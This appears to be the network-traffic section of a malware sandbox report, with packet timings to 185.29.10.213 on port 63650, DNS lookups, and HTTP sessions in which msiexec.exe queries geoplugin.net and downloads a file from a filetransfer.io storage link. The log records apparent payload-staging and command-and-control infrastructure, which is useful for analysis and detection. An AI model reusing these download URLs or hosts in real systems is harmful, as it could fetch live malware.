Dec 4, 2024 06:37:22.474081993 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.475595951 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.475598097 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.475629091 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.477127075 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.477175951 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.477201939 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.477247000 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.478702068 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.478749990 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.479676008 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.480232954 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.480310917 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.481766939 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.481816053 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.481848955 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.481898069 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.483345032 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.483366013 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.483623028 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.484858990 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.484961033 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.486423969 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.486469984 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.486505032 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.486555099 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.487968922 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.488120079 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.488169909 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.489526033 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.489583015 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.491077900 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.491159916 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.491190910 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.491238117 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.492628098 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.492727995 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.492779970 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.494169950 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.494230986 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.495620966 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.495740891 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.543685913 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.557974100 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.558109045 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.558182955 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.558223009 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.558243036 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.558290958 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.559173107 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.559245110 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.559530020 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.560064077 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.560175896 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.560993910 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.561037064 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.561094046 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.561136961 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.561950922 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.562056065 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.562903881 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.562947035 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.563021898 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.563064098 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.563849926 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.564059973 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.564106941 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.564784050 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.564886093 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.564980984 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.565749884 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.565856934 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.565906048 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.566694021 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.566839933 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.566883087 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.567666054 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.567770958 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.567828894 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.568593979 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.568692923 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.569531918 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.569572926 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.569622040 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.569660902 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.570523024 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.570636988 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.570677042 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.571465015 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.571552992 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.571599007 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.572371006 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.572479010 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.572520018 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.573313951 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.573421955 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.573538065 CET  49840        63650      192.168.2.5    185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.574273109 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.574395895 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.575215101 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.575268984 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.575325012 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.575371027 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.576190948 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.576237917 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.577157974 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.577250957 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.577261925 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.577306986 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.578069925 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.578202009 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.578258991 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.579029083 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.579140902 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.579961061 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.580005884 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.580079079 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.580127001 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.580931902 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.581042051 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.581120014 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.581866980 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.581999063 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.582818985 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.582860947 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.582917929 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.582963943 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.583750010 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.583867073 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.584254026 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.584717989 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.584855080 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.585637093 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.585679054 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.671386957 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.671464920 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.671530008 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.671833992 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.671911955 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.672909975 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.672951937 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.673077106 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.673116922 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.673702002 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.673819065 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.673876047 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.674658060 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.674773932 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.675590992 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.675641060 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.675698996 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.675735950 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.676548004 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.676670074 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.677493095 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.677536964 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.677546978 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.678461075 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.678503990 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.678646088 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.678685904 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.679408073 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.679536104 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.680389881 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.680429935 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.680608034 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.680646896 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.681273937 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.681421041 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.681530952 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.682250977 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.682368994 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.683193922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.683245897 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.683288097 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.683325052 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.684271097 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.684480906 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.685549021 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.685626030 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.685678005 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.686074018 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.686093092 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.686125040 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.686145067 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.686996937 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.687103987 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.687154055 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.687933922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.688038111 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.688869953 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.688921928 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.688961029 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.689004898 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.768291950 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.825009108 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:24.756095886 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:24.876199007 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876214027 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876405001 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876416922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876487970 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:24.876503944 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876534939 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876640081 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876652002 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876780987 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876805067 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996485949 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996504068 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996526957 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996716976 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996728897 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996777058 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.997103930 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.997179985 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:33.210922956 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:33.214416981 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:33.335980892 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:38:03.294492960 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:38:03.303924084 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:38:03.424272060 CET6365049825185.29.10.213192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 4, 2024 06:37:06.698788881 CET | 60173 | 53 | 192.168.2.5 | 1.1.1.1
Dec 4, 2024 06:37:06.838856936 CET | 53 | 60173 | 1.1.1.1 | 192.168.2.5
Dec 4, 2024 06:37:09.105364084 CET | 53294 | 53 | 192.168.2.5 | 1.1.1.1
Dec 4, 2024 06:37:09.250102997 CET | 53 | 53294 | 1.1.1.1 | 192.168.2.5
Dec 4, 2024 06:37:16.610054970 CET | 58796 | 53 | 192.168.2.5 | 1.1.1.1
Dec 4, 2024 06:37:16.751357079 CET | 53 | 58796 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 4, 2024 06:37:06.698788881 CET | 192.168.2.5 | 1.1.1.1 | 0x9f11 | Standard query (0) | filetransfer.io | A (IP address) | IN (0x0001) | false
Dec 4, 2024 06:37:09.105364084 CET | 192.168.2.5 | 1.1.1.1 | 0x763d | Standard query (0) | s25.filetransfer.io | A (IP address) | IN (0x0001) | false
Dec 4, 2024 06:37:16.610054970 CET | 192.168.2.5 | 1.1.1.1 | 0xd973 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 4, 2024 06:37:06.838856936 CET | 1.1.1.1 | 192.168.2.5 | 0x9f11 | No error (0) | filetransfer.io | | 104.21.13.139 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 06:37:06.838856936 CET | 1.1.1.1 | 192.168.2.5 | 0x9f11 | No error (0) | filetransfer.io | | 172.67.200.96 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 06:37:09.250102997 CET | 1.1.1.1 | 192.168.2.5 | 0x763d | No error (0) | s25.filetransfer.io | | 104.21.13.139 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 06:37:09.250102997 CET | 1.1.1.1 | 192.168.2.5 | 0x763d | No error (0) | s25.filetransfer.io | | 172.67.200.96 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 06:37:16.751357079 CET | 1.1.1.1 | 192.168.2.5 | 0xd973 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false

• filetransfer.io
• s25.filetransfer.io
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49835 | 178.237.33.50 | 80 | 1292 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 06:37:16.875885010 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 4, 2024 06:37:18.211393118 CET | 1171 | IN | HTTP/1.1 200 OK
date: Wed, 04 Dec 2024 05:37:18 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49807 | 104.21.13.139 | 443 | 1292 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-04 05:37:08 UTC | 190 | OUT | GET /data-package/a8AChfye/download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: filetransfer.io
Cache-Control: no-cache
2024-12-04 05:37:09 UTC | 1270 | IN | HTTP/1.1 302 Found
Date: Wed, 04 Dec 2024 05:37:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: Nette Framework 3
X-Frame-Options: SAMEORIGIN
Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
Set-Cookie: PHPSESSID=eh1ak3nehcfgevvr81o68k5dsg; expires=Wed, 18-Dec-2024 05:37:08 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: X-Requested-With
Location: https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GdexDysqGPV4gUJPKfF6wIBdj2lgqALx3Kd9sN2xyE4lRUNIz5YArD3ws1U%2FyjqNj4SKBmHseHpfUMfBL917RoYsFGF%2FaIC85%2FxXTtxML0%2FoI4t1Sp9sdKGklDRGNhDRL%2FI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ec9715bceff0f37-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1468&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=828&delivery_rate=1893644&cwnd=139&unsent_bytes=0&cid=9c148d84a7b74c38&ts=928&x=0"
2024-12-04 05:37:09 UTC | 99 | IN | Data Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 35 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 59 6f 38 72 79 57 67 57 5a 6e 7a 6e 22 3e 50 6c 65 61 73
Data Ascii: 80<h1>Redirect</h1><p><a href="https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn">Pleas
2024-12-04 05:37:09 UTC | 35 | IN | Data Raw: 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a
                                                                                          Data Ascii: e click here to continue</a>.</p>
                                                                                          2024-12-04 05:37:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          1 | 192.168.2.5 | 49813 | 104.21.13.139 | 443 | 1292 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2024-12-04 05:37:10 UTC281OUTGET /storage/download/Yo8ryWgWZnzn HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: s25.filetransfer.io
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: nette-samesite=1; PHPSESSID=eh1ak3nehcfgevvr81o68k5dsg
                                                                                          2024-12-04 05:37:11 UTC1266INHTTP/1.1 200 OK
